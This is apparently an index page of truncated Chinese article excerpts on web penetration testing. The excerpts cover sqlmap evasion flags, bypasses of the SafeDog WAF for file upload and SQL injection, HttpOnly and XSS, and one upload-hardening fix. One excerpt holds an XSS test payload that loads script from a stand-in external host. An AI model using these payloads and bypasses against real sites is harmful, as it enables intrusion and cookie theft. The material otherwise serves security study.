思维导图 1、SQL注入 如需sqlmap注入测试， 防cc拦截：修改user-agent头+代理（付费代理池） 修改user-agent头： （1）加参数：--random-agent （2）加参数：--user-agent ...

漏洞：任意文件绕过上传漏洞验证。 漏洞危害: 黑客可以上传脚本木马控制网站。 解决方案：白名单过滤文件后缀，并去除上传目录的脚本和执行权限。 解决方法：iis网站->Upload文件夹->处理程序映射(双击)->编辑功能权限->脚本取消勾选 ...

前言 本文以最新版安全狗为例，总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法。 PS：本文仅用于技术研究与讨论，严禁用于任何非法用途，违者后果自负，作者与平台不承担任何责任 PPS：本文首发于freebuf (https://www.freebuf.com/articles ...

题记 常见SQL注入的waf绕过方式总结，借鉴网上大佬与培训课程里面的方式。垃圾参数与注释绕过与分块传输都是我比较熟悉的。 WAF拦截原理：WAF从规则库中匹配敏感字符进行拦截。 关键词大小写绕过 有的WAF因为规则设计的问题，只匹配纯大写或纯小写的字符 ...

文件上传 此处不讲各种中间件解析漏洞只列举集几种safe_dog对脚本文件上传拦截的绕过 靶机环境：win2003+safe_dog4.0.23957+webug中的上传 1、换行 2、多个等号(不止2，3个) 3、00截断 4、文件名+；号 ...

常用测试语句： <script src=http://xxx.com/xss.js></script> #引用外部的 xss <script> a ...

【XSS跨站】---代码及httponly绕过---day27 一、HttpOnly 1、什么是httponly 2、php中httponly的设置 在设置了httponly之后，就无法获取cookie了 虽然httponly可以阻止获取cookie的攻击，但是XSS漏洞 ...

前言: 接触过网络安全行业的人都知道什么是WAF，这是每一个安全人员都会面临的难题，面对市面上各种waf，绕过waf的手段也层出不穷，自己在实战的过程中也经常面临遇到waf但是缺乏绕waf的思路和方法导致渗透测试不能继续下去，在本文中我将会记录自己在学习sql注入绕waf的过程，如有不足之处欢迎 ...